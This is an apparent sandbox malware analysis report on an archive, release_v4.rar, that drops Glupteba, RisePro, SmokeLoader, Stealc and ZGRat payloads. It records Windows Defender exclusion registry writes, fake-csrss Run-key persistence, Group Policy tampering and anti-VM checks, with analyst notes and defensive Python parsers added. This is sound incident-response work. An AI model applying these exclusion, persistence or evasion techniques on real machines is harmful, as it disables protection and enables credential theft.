Malware Analysis Report

2024-11-13 18:56

Sample ID 240223-kxe46aea3y
Target release_v4.rar
SHA256 f2085a595daeffe3d442f07fee0ef1a2d77cdb521fd4ff4475efd87c75da1932
Tags
glupteba risepro smokeloader stealc zgrat pub3 backdoor collection discovery dropper evasion loader persistence rat spyware stealer trojan
score
10/10

Table of Contents

Analysis Overview; MITRE ATT&CK (Enterprise Matrix V15); Analysis: static1 (Detonation Overview, Signatures); Analysis: behavioral8, 9, 11, 13, 14, 2, 6, 7, 4, 5, 12, 1, 3 and 10, in that order, each with Detonation Overview, Command Line, Signatures, Processes, Network and Files.

Analysis Overview

score
10/10

SHA256

f2085a595daeffe3d442f07fee0ef1a2d77cdb521fd4ff4475efd87c75da1932

Threat Level: Known bad

The file release_v4.rar was found to be: Known bad.

Malicious Activity Summary

glupteba risepro smokeloader stealc zgrat pub3 backdoor collection discovery dropper evasion loader persistence rat spyware stealer trojan

Detect ZGRat V1

ZGRat

Glupteba

Stealc

SmokeLoader

Windows security bypass

Glupteba payload

RisePro

Identifies VirtualBox via ACPI registry values (likely anti-VM)

Modifies boot configuration data using bcdedit

Downloads MZ/PE file

Modifies Windows Firewall

Possible attempt to disable PatchGuard

Checks BIOS information in registry

Reads user/profile data of local email clients

Windows security modification

Identifies Wine through registry keys

Loads dropped DLL

Reads user/profile data of web browsers

Reads data files stored by FTP clients

Executes dropped EXE

Checks computer location settings

Adds Run key to start application

Checks installed software on the system

Looks up external IP address via web service

Accesses cryptocurrency files/wallets, possible credential harvesting

Checks whether UAC is enabled

Accesses Microsoft Outlook profiles

Legitimate hosting services abused for malware hosting/C2

Drops Chrome extension

AutoIT Executable

Suspicious use of NtSetInformationThreadHideFromDebugger

Drops file in System32 directory

Checks for VirtualBox DLLs, possible anti-VM trick

Drops file in Windows directory

Launches sc.exe

Program crash

Enumerates physical storage devices

Unsigned PE

Suspicious use of SetWindowsHookEx

Suspicious use of AdjustPrivilegeToken

Suspicious use of SendNotifyMessage

Suspicious use of FindShellTrayWindow

Suspicious use of WriteProcessMemory

Suspicious behavior: EnumeratesProcesses

Modifies data under HKEY_USERS

Checks processor information in registry

Modifies system certificate store

Suspicious behavior: GetForegroundWindowSpam

Suspicious behavior: MapViewOfSection

Enumerates system info in registry

Uses Task Scheduler COM API

outlook_win_path

Modifies registry class

Modifies Internet Explorer settings

Checks SCSI registry key(s)

Creates scheduled task(s)

outlook_office_path

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-02-23 08:59

Signatures

Unsigned PE

Description Indicator Process Target
(5 matches, no per-match indicator recorded)

Analysis: behavioral8

Detonation Overview

Submitted

2024-02-23 08:58

Reported

2024-02-23 09:03

Platform

win10v2004-20240221-en

Max time kernel

110s

Max time network

169s

Command Line

rundll32.exe C:\Users\Admin\AppData\Local\Temp\LiteRes.dll,#1

Signatures

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1980 wrote to memory of 3320 (3 identical events) N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe

Note: the 64-bit rundll32.exe in System32 is handed LiteRes.dll and re-launches the 32-bit copy under SysWOW64 with the same command line, which is what rundll32 does when the DLL it is given is 32-bit. The writes into the child recorded here are part of that process creation and are not, on their own, evidence of injection. Only PTR (reverse-DNS) lookups were captured in this run, with no forward DNS, no TCP sessions and no dropped files, so nothing here shows the DLL reaching out.

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\LiteRes.dll,#1

C:\Windows\SysWOW64\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\LiteRes.dll,#1

Network

Country Destination Domain Proto
US 8.8.8.8:53 23.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 205.47.74.20.in-addr.arpa udp
US 8.8.8.8:53 179.178.17.96.in-addr.arpa udp
US 8.8.8.8:53 86.23.85.13.in-addr.arpa udp
US 8.8.8.8:53 206.23.85.13.in-addr.arpa udp
US 8.8.8.8:53 217.135.221.88.in-addr.arpa udp
US 8.8.8.8:53 0.205.248.87.in-addr.arpa udp
US 8.8.8.8:53 19.229.111.52.in-addr.arpa udp
US 8.8.8.8:53 1.173.189.20.in-addr.arpa udp
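The network rows above are reverse-DNS query names, which carry the address octets in reverse order. The Python below is an added example (it is not sandbox output and not code from any of the tagged malware families): it decodes each in-addr.arpa name back into the IPv4 address being resolved and buckets the results against an analyst-supplied allowlist of CIDR prefixes using the standard ipaddress module. The query names are copied from the table; the prefixes in the demo allowlist are placeholders for the demonstration, not verified ownership data, and the label on them is an assumption.

```python
import ipaddress

# Constructed input: the nine PTR query names from the behavioral8 network table.
PTR_QUERIES = [
    "23.159.190.20.in-addr.arpa",
    "205.47.74.20.in-addr.arpa",
    "179.178.17.96.in-addr.arpa",
    "86.23.85.13.in-addr.arpa",
    "206.23.85.13.in-addr.arpa",
    "217.135.221.88.in-addr.arpa",
    "0.205.248.87.in-addr.arpa",
    "19.229.111.52.in-addr.arpa",
    "1.173.189.20.in-addr.arpa",
]


def ptr_to_ip(name):
    """Turn an IPv4 reverse-DNS query name into the address it refers to.

    in-addr.arpa names list the octets least-significant first, so
    '23.159.190.20.in-addr.arpa' is a lookup for 20.190.159.23.
    Raises ValueError for anything that is not a well-formed IPv4 PTR name.
    """
    suffix = ".in-addr.arpa"
    if not name.lower().endswith(suffix):
        raise ValueError(f"not an IPv4 PTR name: {name}")
    octets = name[: -len(suffix)].split(".")
    if len(octets) != 4:
        raise ValueError(f"expected four octets: {name}")
    # IPv4Address validates each octet and raises a ValueError subclass if bad.
    return str(ipaddress.IPv4Address(".".join(reversed(octets))))


def classify_ptrs(names, allowlist):
    """Decode every PTR name and bucket it by the first allowlisted prefix it falls in.

    allowlist maps a label to a list of CIDR strings. The label is whatever the
    analyst asserts about the range (an assumption, not something the report
    states); addresses matching no prefix are returned under 'unknown'.
    """
    nets = {label: [ipaddress.ip_network(c) for c in cidrs] for label, cidrs in allowlist.items()}
    buckets = {label: [] for label in nets}
    buckets["unknown"] = []
    for name in names:
        ip = ipaddress.ip_address(ptr_to_ip(name))
        for label, ranges in nets.items():
            if any(ip in net for net in ranges):
                buckets[label].append(str(ip))
                break
        else:  # no prefix matched
            buckets["unknown"].append(str(ip))
    return buckets


if __name__ == "__main__":
    # Hypothetical allowlist: these /8 prefixes are demo placeholders, not
    # verified ownership data. Replace with your own telemetry allowlist.
    demo_allowlist = {"assumed-known-ranges": ["20.0.0.0/8", "13.0.0.0/8", "52.0.0.0/8"]}
    for label, ips in classify_ptrs(PTR_QUERIES, demo_allowlist).items():
        print(f"{label}: {ips}")
```

Run it as a script to print the decoded addresses per bucket; swap the placeholder prefixes for the ranges your environment already knows to be Windows or sandbox-host background traffic, and whatever lands in 'unknown' is what deserves a look.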

Files

N/A

Analysis: behavioral9

Detonation Overview

Submitted

2024-02-23 08:58

Reported

2024-02-23 09:02

Platform

win7-20240221-en

Max time kernel

118s

Max time network

125s

Command Line

rundll32.exe C:\Users\Admin\AppData\Local\Temp\LiteSkinUtils.dll,#1

Signatures

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2984 wrote to memory of 2144 (7 identical events) N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe

Note: same pattern as behavioral8, the 64-bit rundll32.exe re-launching its SysWOW64 copy for LiteSkinUtils.dll; no network or file activity was recorded in this win7 run.

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\LiteSkinUtils.dll,#1

C:\Windows\SysWOW64\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\LiteSkinUtils.dll,#1

Network

N/A

Files

N/A

Analysis: behavioral11

Detonation Overview

Submitted

2024-02-23 08:58

Reported

2024-02-23 09:02

Platform

win7-20240215-en

Max time kernel

119s

Max time network

123s

Command Line

C:\Windows\System32\rundll32.exe "C:\Program Files\Windows Photo Viewer\PhotoViewer.dll", ImageView_Fullscreen C:\Users\Admin\AppData\Local\Temp\bentonite.png

Signatures

Enumerates physical storage devices

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Windows\System32\rundll32.exe N/A

Note: this is the stock Windows Photo Viewer invocation (PhotoViewer.dll, ImageView_Fullscreen) for bentonite.png from the archive. Both signatures are low-severity ones that legitimate GUI applications also trigger, and no child process, file write or network activity was recorded, so the image itself shows nothing beyond being bundled with the payloads.

Processes

C:\Windows\System32\rundll32.exe

C:\Windows\System32\rundll32.exe "C:\Program Files\Windows Photo Viewer\PhotoViewer.dll", ImageView_Fullscreen C:\Users\Admin\AppData\Local\Temp\bentonite.png

Network

N/A

Files

memory/1764-0-0x0000000000220000-0x0000000000221000-memory.dmp

memory/1764-1-0x0000000000220000-0x0000000000221000-memory.dmp

Analysis: behavioral13

Detonation Overview

Submitted

2024-02-23 08:58

Reported

2024-02-23 09:02

Platform

win7-20240220-en

Max time kernel

55s

Max time network

154s

Command Line

"C:\Users\Admin\AppData\Local\Temp\setup.exe"

Signatures

Detect ZGRat V1

Description Indicator Process Target
(4 matches, no per-match indicator recorded)

Glupteba

loader dropper glupteba

Glupteba payload

Description Indicator Process Target
(5 matches, no per-match indicator recorded)

RisePro

stealer risepro

SmokeLoader

trojan backdoor smokeloader

Stealc

stealer stealc

Windows security bypass

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\windefender.exe = "0" C:\Users\Admin\Documents\GuardFox\oO_q1f2AwSXGxmbqM3esoqyX.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\System32\drivers = "0" C:\Users\Admin\Documents\GuardFox\oO_q1f2AwSXGxmbqM3esoqyX.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\csrss.exe = "0" C:\Users\Admin\Documents\GuardFox\oO_q1f2AwSXGxmbqM3esoqyX.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\windefender.exe = "0" C:\Users\Admin\Documents\GuardFox\oO_q1f2AwSXGxmbqM3esoqyX.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\oO_q1f2AwSXGxmbqM3esoqyX.exe = "0" C:\Users\Admin\Documents\GuardFox\oO_q1f2AwSXGxmbqM3esoqyX.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\rss = "0" C:\Users\Admin\Documents\GuardFox\oO_q1f2AwSXGxmbqM3esoqyX.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\csrss = "0" C:\Users\Admin\Documents\GuardFox\oO_q1f2AwSXGxmbqM3esoqyX.exe N/A

Note: all seven exclusions are written by a single dropped payload, oO_q1f2AwSXGxmbqM3esoqyX.exe, and whitelist itself plus the locations it uses later in this run (C:\Windows\rss and the csrss.exe it places there, the Temp\csrss staging directory, System32\drivers and a windefender.exe path). This is the pattern behind the Glupteba tag above. Any process other than Defender's own writing values under Exclusions\Paths or Exclusions\Processes is a reliable thing to alert on, since a value of "0" is all it takes for the path or process name to be skipped by real-time scanning.

ZGRat

rat zgrat

Identifies VirtualBox via ACPI registry values (likely anti-VM)

evasion
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\setup.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\Documents\GuardFox\zeU9vv9nuzG3RNfSlJKkwkOp.exe N/A

Downloads MZ/PE file

Modifies Windows Firewall

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\netsh.exe N/A

Possible attempt to disable PatchGuard

evasion

Checks BIOS information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\setup.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\setup.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\Documents\GuardFox\zeU9vv9nuzG3RNfSlJKkwkOp.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\Documents\GuardFox\zeU9vv9nuzG3RNfSlJKkwkOp.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\7zS6B31.tmp\Install.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Control Panel\International\Geo\Nation C:\Users\Admin\Documents\GuardFox\8eOHeex_k9wfHwMD7SGMgz9Y.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\setup.exe N/A

Identifies Wine through registry keys

evasion
Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Software\Wine C:\Users\Admin\Documents\GuardFox\zeU9vv9nuzG3RNfSlJKkwkOp.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\Documents\GuardFox\aWc11fRNx6nQw6sDez3g1qv4.exe N/A
N/A N/A C:\Users\Admin\Documents\GuardFox\aWc11fRNx6nQw6sDez3g1qv4.exe N/A
N/A N/A C:\Users\Admin\Documents\GuardFox\aWc11fRNx6nQw6sDez3g1qv4.exe N/A
N/A N/A C:\Users\Admin\Documents\GuardFox\NyFfxttsDs7yttnSmMFWaHvk.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-JE7UB.tmp\NyFfxttsDs7yttnSmMFWaHvk.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-JE7UB.tmp\NyFfxttsDs7yttnSmMFWaHvk.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-JE7UB.tmp\NyFfxttsDs7yttnSmMFWaHvk.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-JE7UB.tmp\NyFfxttsDs7yttnSmMFWaHvk.tmp N/A
N/A N/A C:\Users\Admin\Documents\GuardFox\aWc11fRNx6nQw6sDez3g1qv4.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS60D5.tmp\Install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS60D5.tmp\Install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS60D5.tmp\Install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS60D5.tmp\Install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS6B31.tmp\Install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS6B31.tmp\Install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS6B31.tmp\Install.exe N/A
N/A N/A C:\Users\Admin\Documents\GuardFox\oO_q1f2AwSXGxmbqM3esoqyX.exe N/A
N/A N/A C:\Users\Admin\Documents\GuardFox\oO_q1f2AwSXGxmbqM3esoqyX.exe N/A
N/A N/A N/A N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe N/A
N/A N/A C:\Windows\rss\csrss.exe N/A
N/A N/A C:\Users\Admin\Documents\GuardFox\ed9bgwrip2NapKmOQF2l_5ag.exe N/A
N/A N/A C:\Users\Admin\Documents\GuardFox\ed9bgwrip2NapKmOQF2l_5ag.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A

Reads data files stored by FTP clients

spyware stealer

Reads user/profile data of local email clients

spyware stealer

Reads user/profile data of web browsers

spyware stealer

Windows security modification

evasion trojan
Description Indicator Process Target
(the same seven Windows Defender exclusion writes by oO_q1f2AwSXGxmbqM3esoqyX.exe listed under "Windows security bypass" above; both signatures fire on the same registry events)

Accesses Microsoft Outlook profiles

collection
Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\Documents\GuardFox\zeU9vv9nuzG3RNfSlJKkwkOp.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\Documents\GuardFox\zeU9vv9nuzG3RNfSlJKkwkOp.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\Documents\GuardFox\zeU9vv9nuzG3RNfSlJKkwkOp.exe N/A

Accesses cryptocurrency files/wallets, possible credential harvesting

spyware

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Software\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\"" C:\Users\Admin\Documents\GuardFox\oO_q1f2AwSXGxmbqM3esoqyX.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Software\Microsoft\Windows\CurrentVersion\Run\RageMP131 = "C:\\Users\\Admin\\AppData\\Local\\RageMP131\\RageMP131.exe" C:\Users\Admin\Documents\GuardFox\zeU9vv9nuzG3RNfSlJKkwkOp.exe N/A

Note: the genuine csrss.exe lives in C:\Windows\System32 and is started by the session manager, never from a Run key. A Run value named csrss that points at C:\Windows\rss\csrss.exe (the file oO_q1f2AwSXGxmbqM3esoqyX.exe creates, see "Drops file in Windows directory" below) is therefore both the persistence mechanism and a masquerading indicator: hunt for any csrss.exe, and more generally any core Windows binary name, outside System32 and SysWOW64. The RageMP131 value is written by a different dropped payload, zeU9vv9nuzG3RNfSlJKkwkOp.exe, and points into the user's AppData\Local.

Checks installed software on the system

discovery

Checks whether UAC is enabled

evasion trojan
Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA C:\Users\Admin\AppData\Local\Temp\setup.exe N/A

Drops Chrome extension

Description Indicator Process Target
File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\eciaojnpihmgkbacgpjnimcpkfeklgag\1.0.5_0\manifest.json C:\Users\Admin\Documents\GuardFox\8eOHeex_k9wfHwMD7SGMgz9Y.exe N/A

Note: the directory name eciaojnpihmgkbacgpjnimcpkfeklgag is the ID Chrome uses for the extension, so that path under User Data\Default\Extensions is a direct host IOC. Pull manifest.json from the sandbox and check its permissions, host_permissions and content_scripts entries before treating the browser profile as clean; a dropped extension is how a stealer keeps reading browser data after its own process has exited.

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A iplogger.org (3 hits) N/A N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A ipinfo.io (6 hits) N/A N/A
N/A api.myip.com (4 hits) N/A N/A

Note: all three domains are legitimate services the dropped payloads use to learn the victim's public IP and location. They are good correlation points in proxy logs, but they also see normal use, so treat them as context for the other indicators rather than as block-list entries on their own.

AutoIT Executable

Description Indicator Process Target
N/A N/A N/A N/A

Drops file in System32 directory

Description Indicator Process Target
File created C:\Windows\System32\GroupPolicy\Machine\Registry.pol C:\Users\Admin\AppData\Local\Temp\setup.exe N/A
File opened for modification C:\Windows\System32\GroupPolicy C:\Users\Admin\Documents\GuardFox\8eOHeex_k9wfHwMD7SGMgz9Y.exe N/A
File opened for modification C:\Windows\SysWOW64\GroupPolicy\gpt.ini C:\Users\Admin\Documents\GuardFox\8eOHeex_k9wfHwMD7SGMgz9Y.exe N/A
File opened for modification C:\Windows\System32\GroupPolicy\Machine\Registry.pol C:\Users\Admin\Documents\GuardFox\8eOHeex_k9wfHwMD7SGMgz9Y.exe N/A
File opened for modification C:\Windows\system32\GroupPolicy\gpt.ini C:\Users\Admin\AppData\Local\Temp\7zS6B31.tmp\Install.exe N/A
File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
File opened for modification C:\Windows\System32\GroupPolicy\gpt.ini C:\Users\Admin\AppData\Local\Temp\setup.exe N/A
File opened for modification C:\Windows\System32\GroupPolicy\GPT.INI C:\Users\Admin\AppData\Local\Temp\setup.exe N/A
File opened for modification C:\Windows\System32\GroupPolicy\GPT.INI C:\Users\Admin\Documents\GuardFox\8eOHeex_k9wfHwMD7SGMgz9Y.exe N/A
File opened for modification C:\Windows\System32\GroupPolicy C:\Users\Admin\AppData\Local\Temp\setup.exe N/A

Note: setup.exe, 8eOHeex_k9wfHwMD7SGMgz9Y.exe and Install.exe are writing Registry.pol and gpt.ini under System32\GroupPolicy, i.e. rewriting the machine's local Group Policy; gpt.ini carries the version counter that makes the policy engine re-apply Registry.pol on the next refresh. Parse the captured Registry.pol (for example with LGPO.exe /parse /m Registry.pol from Microsoft's Security Compliance Toolkit) to see which policies were pushed, and include the local GPO store in any clean-up.

Suspicious use of NtSetInformationThreadHideFromDebugger

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\setup.exe N/A
N/A N/A C:\Users\Admin\Documents\GuardFox\zeU9vv9nuzG3RNfSlJKkwkOp.exe N/A

Checks for VirtualBox DLLs, possible anti-VM trick

Description Indicator Process Target
File opened (read-only) \??\VBoxMiniRdrDN C:\Users\Admin\Documents\GuardFox\oO_q1f2AwSXGxmbqM3esoqyX.exe N/A
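The registry and file rows in this section are raw sandbox detection data in a fixed "Description Indicator Process Target" layout. The Python below is an added example, not part of the sandbox's output and not tooling from any of the tagged families: it parses rows in that layout and flags the behaviours a responder cares about here, namely Windows Defender exclusion writes, the VirtualBox/BIOS/Wine fingerprint checks, the EnableLUA query, Run-key persistence and system-binary masquerading such as C:\Windows\rss\csrss.exe. The sample rows are copied from the tables in this section; the row regex, the category names and the list of core Windows binary names used for the masquerade check are my assumptions.

```python
import re
from dataclasses import dataclass
from typing import Optional

# Constructed input: rows copied from the behavioral13 signature tables.
# Layout is "<action> <indicator>[ = "<value>"] <process> <target>".
SAMPLE_ROWS = [
    r'Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\rss = "0" C:\Users\Admin\Documents\GuardFox\oO_q1f2AwSXGxmbqM3esoqyX.exe N/A',
    r'Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\csrss.exe = "0" C:\Users\Admin\Documents\GuardFox\oO_q1f2AwSXGxmbqM3esoqyX.exe N/A',
    r'Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\setup.exe N/A',
    r'Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\setup.exe N/A',
    r'Key opened \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Software\Wine C:\Users\Admin\Documents\GuardFox\zeU9vv9nuzG3RNfSlJKkwkOp.exe N/A',
    r'Set value (str) \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Software\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\"" C:\Users\Admin\Documents\GuardFox\oO_q1f2AwSXGxmbqM3esoqyX.exe N/A',
    r'Set value (str) \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Software\Microsoft\Windows\CurrentVersion\Run\RageMP131 = "C:\\Users\\Admin\\AppData\\Local\\RageMP131\\RageMP131.exe" C:\Users\Admin\Documents\GuardFox\zeU9vv9nuzG3RNfSlJKkwkOp.exe N/A',
    r'File opened (read-only) \??\VBoxMiniRdrDN C:\Users\Admin\Documents\GuardFox\oO_q1f2AwSXGxmbqM3esoqyX.exe N/A',
    r'Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA C:\Users\Admin\AppData\Local\Temp\setup.exe N/A',
]

# Assumed row grammar: a known action phrase, a lazily matched indicator, an
# optional quoted value, then the process path (first token shaped like X:\...)
# and the target column.
ROW = re.compile(
    r'^(?P<action>Set value \((?:int|str|data)\)'
    r'|Key (?:opened|created|enumerated|queried|value queried)'
    r'|File (?:created|opened \(read-only\)|opened for modification)) '
    r'(?P<indicator>.+?)(?: = "(?P<value>.*)")? '
    r'(?P<process>[A-Za-z]:\\.+?|N/A) (?P<target>N/A|[A-Za-z]:\\\S.*)$'
)

# Assumption: core binaries that only ever run from these directories.
SYSTEM_BINARIES = {"csrss.exe", "svchost.exe", "lsass.exe", "winlogon.exe", "services.exe", "explorer.exe"}
SYSTEM_DIRS = {"c:\\windows\\system32", "c:\\windows\\syswow64", "c:\\windows"}

# Registry keys / device names the sample touched that only exist (or only
# matter) inside a VM or a Wine sandbox; matched against the lowercased indicator.
VM_FINGERPRINTS = [
    ("virtualbox-acpi-table", re.compile(r"\\acpi\\dsdt\\vbox__$")),
    ("virtualbox-device", re.compile(r"^\\\?\?\\vboxminirdrdn$")),
    ("bios-version-string", re.compile(r"\\description\\system\\(?:system|video)biosversion$")),
    ("wine-registry-key", re.compile(r"\\software\\wine$")),
]


@dataclass
class Row:
    action: str
    indicator: str
    value: Optional[str]
    process: str
    target: str


def parse_row(line):
    """Parse one report row; raises ValueError if it does not fit the layout."""
    m = ROW.match(line.strip())
    if not m:
        raise ValueError(f"unrecognised row: {line!r}")
    return Row(m["action"], m["indicator"], m["value"], m["process"], m["target"])


def unescape(value):
    """Undo the report's value quoting: \\" -> " and \\\\ -> \\, then strip outer quotes."""
    return value.replace('\\"', '"').replace('\\\\', '\\').strip('"')


def is_masquerade(path):
    """True when a file named like a core Windows binary sits outside its real home."""
    directory, _, name = path.lower().strip('"').rpartition("\\")
    return name in SYSTEM_BINARIES and directory not in SYSTEM_DIRS


def classify(row):
    """Map one parsed row to zero or more (category, detail) findings."""
    findings = []
    ind = row.indicator.lower()
    if row.action.startswith("Set value") and "\\windows defender\\exclusions\\" in ind:
        findings.append(("defender-exclusion", row.indicator.split("\\Exclusions\\", 1)[1]))
    for label, pattern in VM_FINGERPRINTS:
        if pattern.search(ind):
            findings.append(("anti-vm", label))
    if ind.endswith("\\policies\\system\\enablelua"):
        findings.append(("uac-check", "EnableLUA queried"))
    if "\\currentversion\\run\\" in ind and row.value is not None:
        target = unescape(row.value)
        findings.append(("run-key", target))
        if is_masquerade(target):
            findings.append(("masquerade", target))
    if is_masquerade(row.process):
        findings.append(("masquerade", row.process))
    return findings


def triage(lines):
    """Parse every row and return (category, detail, process) findings in row order."""
    found = []
    for line in lines:
        row = parse_row(line)
        for category, detail in classify(row):
            found.append((category, detail, row.process))
    return found


if __name__ == "__main__":
    for category, detail, process in triage(SAMPLE_ROWS):
        print(f"{category:22} {detail}  <- {process}")
```

Feeding the whole behavioral13 table through triage() gives a per-process view that the flat signature list does not: here every Defender exclusion, the Run key and the masquerading csrss.exe trace back to oO_q1f2AwSXGxmbqM3esoqyX.exe, while the VM checks are split between setup.exe and zeU9vv9nuzG3RNfSlJKkwkOp.exe. The anti-vm labels double as a checklist for hardening the analysis VM: the ACPI DSDT table name, the VBoxMiniRdrDN device and the BIOS version strings are all things the sample reads before deciding whether to run.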

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\Logs\CBS\CbsPersist_20240223090023.cab C:\Windows\system32\makecab.exe N/A
File created C:\Windows\Tasks\beMXFFiCiqlBKkvOrW.job C:\Program Files\Internet Explorer\iexplore.exe N/A
File opened for modification C:\Windows\rss C:\Users\Admin\Documents\GuardFox\oO_q1f2AwSXGxmbqM3esoqyX.exe N/A
File created C:\Windows\rss\csrss.exe C:\Users\Admin\Documents\GuardFox\oO_q1f2AwSXGxmbqM3esoqyX.exe N/A

Note: the CbsPersist_*.cab written by makecab.exe is routine compression of the servicing log and is unrelated to the sample. The .job file under C:\Windows\Tasks is the legacy Task Scheduler job format; Internet Explorer does not create job files on its own, so the write attributed to iexplore.exe points at code running inside that process (compare the "Uses Task Scheduler COM API" and "Creates scheduled task(s)" signatures in the summary). C:\Windows\rss\csrss.exe is the file the Run key and the Defender exclusions above refer to.

Launches sc.exe

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\sc.exe N/A

Enumerates physical storage devices

Checks SCSI registry key(s)

Description Indicator Process Target
